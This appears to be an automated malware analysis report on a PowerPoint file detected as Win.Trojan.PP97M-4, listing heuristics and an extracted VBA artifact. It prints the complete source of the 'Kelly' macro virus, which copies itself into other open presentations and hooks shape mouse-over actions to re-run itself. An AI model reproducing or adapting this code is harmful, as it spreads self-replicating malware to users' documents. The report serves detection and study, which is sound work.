MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
This PowerPoint file contains VBA macros detected by ClamAV as Win.Trojan.PP97M-4. The macro code, named 'Kelly', is designed to copy itself to other open presentations and execute. This behavior suggests a downloader or dropper functionality, aiming to spread and potentially execute further malicious code, though no specific payload or network indicators were extracted.
Heuristics 2
-
ClamAV: Win.Trojan.PP97M-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.PP97M-4
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 656 bytes |
SHA-256: 059c1ec401199eb56ca5062920646695c5ce2e6d58b37b1b51ebebbf67744ad2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kelly"
'Copyright (C) 1998 by FlyShadow ~^^~ - Kelly
Sub ι(Kelly)
On Error Resume Next
Set α = ActivePresentation.VBProject.VBComponents("Kelly").CodeModule
ν = α.CountOfLines + 1: λ = α.Lines(1, ν)
For Each ν In Presentations
If ν.VBProject.VBComponents(α).Name <> α Then
ν.VBProject.VBComponents.Add(1).Name = α
ν.VBProject.VBComponents(α).CodeModule.InsertLines 1, λ
For Each η In ν.Slides(ν.Slides.Count).Shapes
If η.ActionSettings(ppMouseOver).Action = 0 Then _
η.ActionSettings(ppMouseOver).Action = ppActionRunMacro: _
η.ActionSettings(ppMouseOver).Run = "ι"
Next: End If: Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.